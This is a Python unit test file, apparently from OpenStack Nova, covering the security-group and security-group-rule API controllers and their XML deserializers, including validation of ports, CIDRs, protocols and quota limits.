req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
res_dict = self.controller.index(req)
self.assertEquals(res_dict, expected)
def test_get_security_group_list_all_tenants(self):
all_groups = []
tenant_groups = []
for i, name in enumerate(['default', 'test']):
sg = security_group_template(id=i + 1,
name=name,
description=name + '-desc',
rules=[])
all_groups.append(sg)
if name == 'default':
tenant_groups.append(sg)
all = {'security_groups': all_groups}
tenant_specific = {'security_groups': tenant_groups}
def return_all_security_groups(context):
return [security_group_db(sg) for sg in all_groups]
self.stubs.Set(nova.db, 'security_group_get_all',
return_all_security_groups)
def return_tenant_security_groups(context, project_id):
return [security_group_db(sg) for sg in tenant_groups]
self.stubs.Set(nova.db, 'security_group_get_by_project',
return_tenant_security_groups)
path = '/v2/fake/os-security-groups'
req = fakes.HTTPRequest.blank(path, use_admin_context=True)
res_dict = self.controller.index(req)
self.assertEquals(res_dict, tenant_specific)
req = fakes.HTTPRequest.blank('%s?all_tenants=1' % path,
use_admin_context=True)
res_dict = self.controller.index(req)
self.assertEquals(res_dict, all)
def test_get_security_group_by_instance(self):
groups = []
for i, name in enumerate(['default', 'test']):
sg = security_group_template(id=i + 1,
name=name,
description=name + '-desc',
rules=[])
groups.append(sg)
expected = {'security_groups': groups}
def return_instance(context, server_id):
self.assertEquals(server_id, FAKE_UUID1)
return return_server_by_uuid(context, server_id)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_instance)
def return_security_groups(context, instance_id):
self.assertEquals(instance_id, 1)
return [security_group_db(sg) for sg in groups]
self.stubs.Set(nova.db, 'security_group_get_by_instance',
return_security_groups)
req = fakes.HTTPRequest.blank('/v2/%s/servers/%s/os-security-groups' %
('fake', FAKE_UUID1))
res_dict = self.server_controller.index(req, FAKE_UUID1)
self.assertEquals(res_dict, expected)
def test_get_security_group_by_instance_non_existing(self):
self.stubs.Set(nova.db, 'instance_get', return_server_nonexistent)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/os-security-groups')
self.assertRaises(webob.exc.HTTPNotFound,
self.server_controller.index, req, '1')
def test_get_security_group_by_instance_invalid_id(self):
req = fakes.HTTPRequest.blank(
'/v2/fake/servers/invalid/os-security-groups')
self.assertRaises(webob.exc.HTTPNotFound,
self.server_controller.index, req, 'invalid')
def test_get_security_group_by_id(self):
sg = security_group_template(id=2, rules=[])
def return_security_group(context, group_id):
self.assertEquals(sg['id'], group_id)
return security_group_db(sg)
self.stubs.Set(nova.db, 'security_group_get',
return_security_group)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/2')
res_dict = self.controller.show(req, '2')
expected = {'security_group': sg}
self.assertEquals(res_dict, expected)
def test_get_security_group_by_invalid_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/invalid')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
req, 'invalid')
def test_get_security_group_by_non_existing_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/%s' %
self.fake_id)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
req, self.fake_id)
def test_delete_security_group_by_id(self):
sg = security_group_template(id=1, rules=[])
self.called = False
def security_group_destroy(context, id):
self.called = True
def return_security_group(context, group_id):
self.assertEquals(sg['id'], group_id)
return security_group_db(sg)
self.stubs.Set(nova.db, 'security_group_destroy',
security_group_destroy)
self.stubs.Set(nova.db, 'security_group_get',
return_security_group)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/1')
self.controller.delete(req, '1')
self.assertTrue(self.called)
def test_delete_security_group_by_invalid_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/invalid')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
req, 'invalid')
def test_delete_security_group_by_non_existing_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/%s'
% self.fake_id)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
req, self.fake_id)
def test_delete_security_group_in_use(self):
sg = security_group_template(id=1, rules=[])
def security_group_in_use(context, id):
return True
def return_security_group(context, group_id):
self.assertEquals(sg['id'], group_id)
return security_group_db(sg)
self.stubs.Set(nova.db, 'security_group_in_use',
security_group_in_use)
self.stubs.Set(nova.db, 'security_group_get',
return_security_group)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/1')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
req, '1')
def test_associate_by_non_existing_security_group_name(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
self.assertEquals(return_server(None, '1'),
nova.db.instance_get(None, '1'))
body = dict(addSecurityGroup=dict(name='non-existing'))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_by_invalid_server_id(self):
body = dict(addSecurityGroup=dict(name='test'))
req = fakes.HTTPRequest.blank('/v2/fake/servers/invalid/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._addSecurityGroup, req, 'invalid', body)
def test_associate_without_body(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
body = dict(addSecurityGroup=None)
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_no_security_group_name(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
body = dict(addSecurityGroup=dict())
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_security_group_name_with_whitespaces(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
body = dict(addSecurityGroup=dict(name=" "))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_non_existing_instance(self):
self.stubs.Set(nova.db, 'instance_get', return_server_nonexistent)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
body = dict(addSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_non_running_instance(self):
self.stubs.Set(nova.db, 'instance_get', return_non_running_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_non_running_server)
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_without_instances)
body = dict(addSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_already_associated_security_group_to_instance(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_by_uuid)
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_by_name)
body = dict(addSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._addSecurityGroup, req, '1', body)
def test_associate(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_by_uuid)
self.mox.StubOutWithMock(nova.db, 'instance_add_security_group')
nova.db.instance_add_security_group(mox.IgnoreArg(),
mox.IgnoreArg(),
mox.IgnoreArg())
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_without_instances)
self.mox.ReplayAll()
body = dict(addSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.manager._addSecurityGroup(req, '1', body)
def test_disassociate_by_non_existing_security_group_name(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
self.assertEquals(return_server(None, '1'),
nova.db.instance_get(None, '1'))
body = dict(removeSecurityGroup=dict(name='non-existing'))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._removeSecurityGroup, req, '1', body)
def test_disassociate_by_invalid_server_id(self):
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_by_name)
body = dict(removeSecurityGroup=dict(name='test'))
req = fakes.HTTPRequest.blank('/v2/fake/servers/invalid/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._removeSecurityGroup, req, 'invalid',
body)
def test_disassociate_without_body(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
body = dict(removeSecurityGroup=None)
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._removeSecurityGroup, req, '1', body)
    def test_disassociate_no_security_group_name(self):
        """A payload missing the group name yields HTTP 400."""
        self.stubs.Set(nova.db, 'instance_get', return_server)
        body = dict(removeSecurityGroup=dict())
        req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.manager._removeSecurityGroup, req, '1', body)
    def test_disassociate_security_group_name_with_whitespaces(self):
        """A whitespace-only group name yields HTTP 400."""
        self.stubs.Set(nova.db, 'instance_get', return_server)
        body = dict(removeSecurityGroup=dict(name="   "))
        req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.manager._removeSecurityGroup, req, '1', body)
    def test_disassociate_non_existing_instance(self):
        """Removing a group from a nonexistent instance yields HTTP 404."""
        self.stubs.Set(nova.db, 'instance_get', return_server_nonexistent)
        self.stubs.Set(nova.db, 'security_group_get_by_name',
                       return_security_group_by_name)
        body = dict(removeSecurityGroup=dict(name="test"))
        req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
        self.assertRaises(webob.exc.HTTPNotFound,
                          self.manager._removeSecurityGroup, req, '1', body)
    def test_disassociate_non_running_instance(self):
        """Removing a group from a non-running instance yields HTTP 400."""
        self.stubs.Set(nova.db, 'instance_get', return_non_running_server)
        self.stubs.Set(nova.db, 'instance_get_by_uuid',
                       return_non_running_server)
        self.stubs.Set(nova.db, 'security_group_get_by_name',
                       return_security_group_by_name)
        body = dict(removeSecurityGroup=dict(name="test"))
        req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.manager._removeSecurityGroup, req, '1', body)
    def test_disassociate_already_associated_security_group_to_instance(self):
        """Removing a group that is not on the instance yields HTTP 400."""
        self.stubs.Set(nova.db, 'instance_get', return_server)
        self.stubs.Set(nova.db, 'instance_get_by_uuid',
                       return_server_by_uuid)
        # Group stub has no instances attached, so removal is invalid.
        self.stubs.Set(nova.db, 'security_group_get_by_name',
                       return_security_group_without_instances)
        body = dict(removeSecurityGroup=dict(name="test"))
        req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.manager._removeSecurityGroup, req, '1', body)
    def test_disassociate(self):
        """_removeSecurityGroup succeeds for a valid instance and group."""
        self.stubs.Set(nova.db, 'instance_get', return_server)
        self.stubs.Set(nova.db, 'instance_get_by_uuid',
                       return_server_by_uuid)
        # Record exactly one expected db remove call; ReplayAll arms it.
        self.mox.StubOutWithMock(nova.db, 'instance_remove_security_group')
        nova.db.instance_remove_security_group(mox.IgnoreArg(),
                                               mox.IgnoreArg(),
                                               mox.IgnoreArg())
        self.stubs.Set(nova.db, 'security_group_get_by_name',
                       return_security_group_by_name)
        self.mox.ReplayAll()
        body = dict(removeSecurityGroup=dict(name="test"))
        req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
        self.manager._removeSecurityGroup(req, '1', body)
class TestSecurityGroupRules(test.TestCase):
    """Tests for the os-security-group-rules create/delete controller."""
    def setUp(self):
        super(TestSecurityGroupRules, self).setUp()
        # NOTE(review): a SecurityGroupController is built first only to
        # probe whether the active security group API uses UUID ids; it is
        # replaced with the rules controller at the end of setUp.
        self.controller = security_groups.SecurityGroupController()
        if self.controller.security_group_api.id_is_uuid:
            id1 = '11111111-1111-1111-1111-111111111111'
            id2 = '22222222-2222-2222-2222-222222222222'
            self.invalid_id = '33333333-3333-3333-3333-333333333333'
        else:
            id1 = 1
            id2 = 2
            self.invalid_id = '33333333'
        self.sg1 = security_group_template(id=id1)
        self.sg2 = security_group_template(
            id=id2, name='authorize_revoke',
            description='authorize-revoke testing')
        db1 = security_group_db(self.sg1)
        db2 = security_group_db(self.sg2)
        def return_security_group(context, group_id):
            # Fake nova.db lookup covering only the two groups above.
            if group_id == db1['id']:
                return db1
            if group_id == db2['id']:
                return db2
            raise exception.NotFound()
        self.stubs.Set(nova.db, 'security_group_get',
                       return_security_group)
        self.parent_security_group = db2
        self.controller = security_groups.SecurityGroupRulesController()
    def test_create_by_cidr(self):
        rule = security_group_rule_template(cidr='10.2.3.124/24',
                                            parent_group_id=self.sg2['id'])
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        res_dict = self.controller.create(req, {'security_group_rule': rule})
        security_group_rule = res_dict['security_group_rule']
        self.assertNotEquals(security_group_rule['id'], 0)
        self.assertEquals(security_group_rule['parent_group_id'],
                          self.sg2['id'])
        self.assertEquals(security_group_rule['ip_range']['cidr'],
                          "10.2.3.124/24")
    def test_create_by_group_id(self):
        rule = security_group_rule_template(group_id=self.sg1['id'],
                                            parent_group_id=self.sg2['id'])
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        res_dict = self.controller.create(req, {'security_group_rule': rule})
        security_group_rule = res_dict['security_group_rule']
        self.assertNotEquals(security_group_rule['id'], 0)
        self.assertEquals(security_group_rule['parent_group_id'],
                          self.sg2['id'])
    def test_create_by_same_group_id(self):
        """Same source group on different ports must not be a duplicate."""
        rule1 = security_group_rule_template(group_id=self.sg1['id'],
                                             from_port=80, to_port=80,
                                             parent_group_id=self.sg2['id'])
        self.parent_security_group['rules'] = [security_group_rule_db(rule1)]
        rule2 = security_group_rule_template(group_id=self.sg1['id'],
                                             from_port=81, to_port=81,
                                             parent_group_id=self.sg2['id'])
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        res_dict = self.controller.create(req, {'security_group_rule': rule2})
        security_group_rule = res_dict['security_group_rule']
        self.assertNotEquals(security_group_rule['id'], 0)
        self.assertEquals(security_group_rule['parent_group_id'],
                          self.sg2['id'])
        self.assertEquals(security_group_rule['from_port'], 81)
        self.assertEquals(security_group_rule['to_port'], 81)
    def test_create_by_invalid_cidr_json(self):
        rule = security_group_rule_template(
                ip_protocol="tcp",
                from_port=22,
                to_port=22,
                parent_group_id=self.sg2['id'],
                cidr="10.2.3.124/2433")
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_by_invalid_tcp_port_json(self):
        rule = security_group_rule_template(
                ip_protocol="tcp",
                from_port=75534,
                to_port=22,
                parent_group_id=self.sg2['id'],
                cidr="10.2.3.124/24")
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_by_invalid_icmp_port_json(self):
        # ICMP "ports" are type/code; 256 exceeds the valid 0-255 range.
        rule = security_group_rule_template(
                ip_protocol="icmp",
                from_port=1,
                to_port=256,
                parent_group_id=self.sg2['id'],
                cidr="10.2.3.124/24")
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_add_existing_rules_by_cidr(self):
        rule = security_group_rule_template(cidr='10.0.0.0/24',
                                            parent_group_id=self.sg2['id'])
        self.parent_security_group['rules'] = [security_group_rule_db(rule)]
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_add_existing_rules_by_group_id(self):
        rule = security_group_rule_template(group_id=1)
        self.parent_security_group['rules'] = [security_group_rule_db(rule)]
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_with_no_body(self):
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPUnprocessableEntity,
                          self.controller.create, req, None)
    def test_create_with_no_security_group_rule_in_body(self):
        rules = {'test': 'test'}
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPUnprocessableEntity,
                          self.controller.create, req, rules)
    def test_create_with_invalid_parent_group_id(self):
        rule = security_group_rule_template(parent_group_id='invalid')
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_with_non_existing_parent_group_id(self):
        rule = security_group_rule_template(group_id='invalid',
                                            parent_group_id=self.invalid_id)
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPNotFound, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_with_invalid_protocol(self):
        rule = security_group_rule_template(ip_protocol='invalid-protocol',
                                            cidr='10.2.2.0/24',
                                            parent_group_id=self.sg2['id'])
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_with_no_protocol(self):
        rule = security_group_rule_template(cidr='10.2.2.0/24',
                                            parent_group_id=self.sg2['id'])
        del rule['ip_protocol']
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_with_invalid_from_port(self):
        rule = security_group_rule_template(from_port='666666',
                                            cidr='10.2.2.0/24',
                                            parent_group_id=self.sg2['id'])
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_with_invalid_to_port(self):
        rule = security_group_rule_template(to_port='666666',
                                            cidr='10.2.2.0/24',
                                            parent_group_id=self.sg2['id'])
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_with_non_numerical_from_port(self):
        rule = security_group_rule_template(from_port='invalid',
                                            cidr='10.2.2.0/24',
                                            parent_group_id=self.sg2['id'])
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_with_non_numerical_to_port(self):
        rule = security_group_rule_template(to_port='invalid',
                                            cidr='10.2.2.0/24',
                                            parent_group_id=self.sg2['id'])
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_with_no_from_port(self):
        rule = security_group_rule_template(cidr='10.2.2.0/24',
                                            parent_group_id=self.sg2['id'])
        del rule['from_port']
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_with_no_to_port(self):
        rule = security_group_rule_template(cidr='10.2.2.0/24',
                                            parent_group_id=self.sg2['id'])
        del rule['to_port']
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_with_invalid_cidr(self):
        rule = security_group_rule_template(cidr='10.2.2222.0/24',
                                            parent_group_id=self.sg2['id'])
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_with_no_cidr_group(self):
        """Omitting both cidr and group defaults the range to 0.0.0.0/0."""
        rule = security_group_rule_template(parent_group_id=self.sg2['id'])
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        res_dict = self.controller.create(req, {'security_group_rule': rule})
        security_group_rule = res_dict['security_group_rule']
        self.assertNotEquals(security_group_rule['id'], 0)
        self.assertEquals(security_group_rule['parent_group_id'],
                          self.parent_security_group['id'])
        self.assertEquals(security_group_rule['ip_range']['cidr'],
                          "0.0.0.0/0")
    def test_create_with_invalid_group_id(self):
        rule = security_group_rule_template(group_id='invalid',
                                            parent_group_id=self.sg2['id'])
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_with_empty_group_id(self):
        rule = security_group_rule_template(group_id='',
                                            parent_group_id=self.sg2['id'])
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_with_nonexist_group_id(self):
        rule = security_group_rule_template(group_id=self.invalid_id,
                                            parent_group_id=self.sg2['id'])
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_with_same_group_parent_id_and_group_id(self):
        """A group may reference itself as both source and parent."""
        rule = security_group_rule_template(group_id=self.sg1['id'],
                                            parent_group_id=self.sg1['id'])
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        res_dict = self.controller.create(req, {'security_group_rule': rule})
        security_group_rule = res_dict['security_group_rule']
        self.assertNotEquals(security_group_rule['id'], 0)
        self.assertEquals(security_group_rule['parent_group_id'],
                          self.sg1['id'])
        self.assertEquals(security_group_rule['group']['name'],
                          self.sg1['name'])
    def _test_create_with_no_ports_and_no_group(self, proto):
        """Without a source group, omitting ports is a 400 error."""
        rule = {'ip_protocol': proto, 'parent_group_id': self.sg2['id']}
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
    def _test_create_with_no_ports(self, proto):
        """With a source group, omitted ports default to the full range."""
        rule = {'ip_protocol': proto, 'parent_group_id': self.sg2['id'],
                'group_id': self.sg1['id']}
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        res_dict = self.controller.create(req, {'security_group_rule': rule})
        security_group_rule = res_dict['security_group_rule']
        expected_rule = {
            'from_port': 1, 'group': {'tenant_id': '123', 'name': 'test'},
            'ip_protocol': proto, 'to_port': 65535, 'parent_group_id':
             self.sg2['id'], 'ip_range': {}, 'id': security_group_rule['id']
        }
        if proto == 'icmp':
            # -1 means "all types/codes" for ICMP rules.
            expected_rule['to_port'] = -1
            expected_rule['from_port'] = -1
        self.assertTrue(security_group_rule == expected_rule)
    def test_create_with_no_ports_icmp(self):
        self._test_create_with_no_ports_and_no_group('icmp')
        self._test_create_with_no_ports('icmp')
    def test_create_with_no_ports_tcp(self):
        self._test_create_with_no_ports_and_no_group('tcp')
        self._test_create_with_no_ports('tcp')
    def test_create_with_no_ports_udp(self):
        self._test_create_with_no_ports_and_no_group('udp')
        self._test_create_with_no_ports('udp')
    def _test_create_with_ports(self, proto, from_port, to_port):
        """Explicit ports are echoed back unchanged in the created rule."""
        rule = {
            'ip_protocol': proto, 'from_port': from_port, 'to_port': to_port,
            'parent_group_id': self.sg2['id'], 'group_id': self.sg1['id']
        }
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        res_dict = self.controller.create(req, {'security_group_rule': rule})
        security_group_rule = res_dict['security_group_rule']
        expected_rule = {
            'from_port': from_port,
            'group': {'tenant_id': '123', 'name': 'test'},
            'ip_protocol': proto, 'to_port': to_port, 'parent_group_id':
             self.sg2['id'], 'ip_range': {}, 'id': security_group_rule['id']
        }
        self.assertTrue(security_group_rule['ip_protocol'] == proto)
        self.assertTrue(security_group_rule['from_port'] == from_port)
        self.assertTrue(security_group_rule['to_port'] == to_port)
        self.assertTrue(security_group_rule == expected_rule)
    def test_create_with_ports_icmp(self):
        self._test_create_with_ports('icmp', 0, 1)
        self._test_create_with_ports('icmp', 0, 0)
        self._test_create_with_ports('icmp', 1, 0)
    def test_create_with_ports_tcp(self):
        self._test_create_with_ports('tcp', 1, 1)
        self._test_create_with_ports('tcp', 1, 65535)
        self._test_create_with_ports('tcp', 65535, 65535)
    def test_create_with_ports_udp(self):
        self._test_create_with_ports('udp', 1, 1)
        self._test_create_with_ports('udp', 1, 65535)
        self._test_create_with_ports('udp', 65535, 65535)
    def test_delete(self):
        rule = security_group_rule_template(id=self.sg2['id'],
                                            parent_group_id=self.sg2['id'])
        def security_group_rule_get(context, id):
            return security_group_rule_db(rule)
        def security_group_rule_destroy(context, id):
            pass
        self.stubs.Set(nova.db, 'security_group_rule_get',
                       security_group_rule_get)
        self.stubs.Set(nova.db, 'security_group_rule_destroy',
                       security_group_rule_destroy)
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules/%s'
                                      % self.sg2['id'])
        self.controller.delete(req, self.sg2['id'])
    def test_delete_invalid_rule_id(self):
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules' +
                                      '/invalid')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
                          req, 'invalid')
    def test_delete_non_existing_rule_id(self):
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules/%s'
                                      % self.invalid_id)
        self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
                          req, self.invalid_id)
    def test_create_rule_quota_limit(self):
        """Creating one rule past the configured quota raises the limit."""
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        # Fill the quota with distinct single-port rules.
        for num in range(100, 100 + CONF.quota_security_group_rules):
            rule = {
                'ip_protocol': 'tcp', 'from_port': num,
                'to_port': num, 'parent_group_id': self.sg2['id'],
                'group_id': self.sg1['id']
            }
            self.controller.create(req, {'security_group_rule': rule})
        rule = {
            'ip_protocol': 'tcp', 'from_port': '121', 'to_port': '121',
            'parent_group_id': self.sg2['id'], 'group_id': self.sg1['id']
        }
        self.assertRaises(exception.SecurityGroupLimitExceeded,
                          self.controller.create,
                          req, {'security_group_rule': rule})
    def test_create_rule_cidr_allow_all(self):
        rule = security_group_rule_template(cidr='0.0.0.0/0',
                                            parent_group_id=self.sg2['id'])
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        res_dict = self.controller.create(req, {'security_group_rule': rule})
        security_group_rule = res_dict['security_group_rule']
        self.assertNotEquals(security_group_rule['id'], 0)
        self.assertEquals(security_group_rule['parent_group_id'],
                          self.parent_security_group['id'])
        self.assertEquals(security_group_rule['ip_range']['cidr'],
                          "0.0.0.0/0")
    def test_create_rule_cidr_allow_some(self):
        rule = security_group_rule_template(cidr='15.0.0.0/8',
                                            parent_group_id=self.sg2['id'])
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        res_dict = self.controller.create(req, {'security_group_rule': rule})
        security_group_rule = res_dict['security_group_rule']
        self.assertNotEquals(security_group_rule['id'], 0)
        self.assertEquals(security_group_rule['parent_group_id'],
                          self.parent_security_group['id'])
        self.assertEquals(security_group_rule['ip_range']['cidr'],
                          "15.0.0.0/8")
    def test_create_rule_cidr_bad_netmask(self):
        rule = security_group_rule_template(cidr='15.0.0.0/0')
        req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          req, {'security_group_rule': rule})
class TestSecurityGroupRulesXMLDeserializer(test.TestCase):
    """Tests XML-to-dict deserialization of security group rule bodies."""
    def setUp(self):
        super(TestSecurityGroupRulesXMLDeserializer, self).setUp()
        self.deserializer = security_groups.SecurityGroupRulesXMLDeserializer()
    def test_create_request(self):
        """All child elements map to string values in the request dict."""
        serial_request = """
<security_group_rule>
  <parent_group_id>12</parent_group_id>
  <from_port>22</from_port>
  <to_port>22</to_port>
  <group_id></group_id>
  <ip_protocol>tcp</ip_protocol>
  <cidr>10.0.0.0/24</cidr>
</security_group_rule>"""
        request = self.deserializer.deserialize(serial_request)
        expected = {
            "security_group_rule": {
                "parent_group_id": "12",
                "from_port": "22",
                "to_port": "22",
                "ip_protocol": "tcp",
                "group_id": "",
                "cidr": "10.0.0.0/24",
            },
        }
        self.assertEquals(request['body'], expected)
    def test_create_no_protocol_request(self):
        """A missing ip_protocol element is simply absent from the dict."""
        serial_request = """
<security_group_rule>
  <parent_group_id>12</parent_group_id>
  <from_port>22</from_port>
  <to_port>22</to_port>
  <group_id></group_id>
  <cidr>10.0.0.0/24</cidr>
</security_group_rule>"""
        request = self.deserializer.deserialize(serial_request)
        expected = {
            "security_group_rule": {
                "parent_group_id": "12",
                "from_port": "22",
                "to_port": "22",
                "group_id": "",
                "cidr": "10.0.0.0/24",
            },
        }
        self.assertEquals(request['body'], expected)
    def test_corrupt_xml(self):
        """Should throw a 400 error on corrupt xml."""
        self.assertRaises(
                exception.MalformedRequestBody,
                self.deserializer.deserialize,
                utils.killer_xml_body())
class TestSecurityGroupXMLDeserializer(test.TestCase):
    """Tests XML-to-dict deserialization of security group bodies."""
    def setUp(self):
        super(TestSecurityGroupXMLDeserializer, self).setUp()
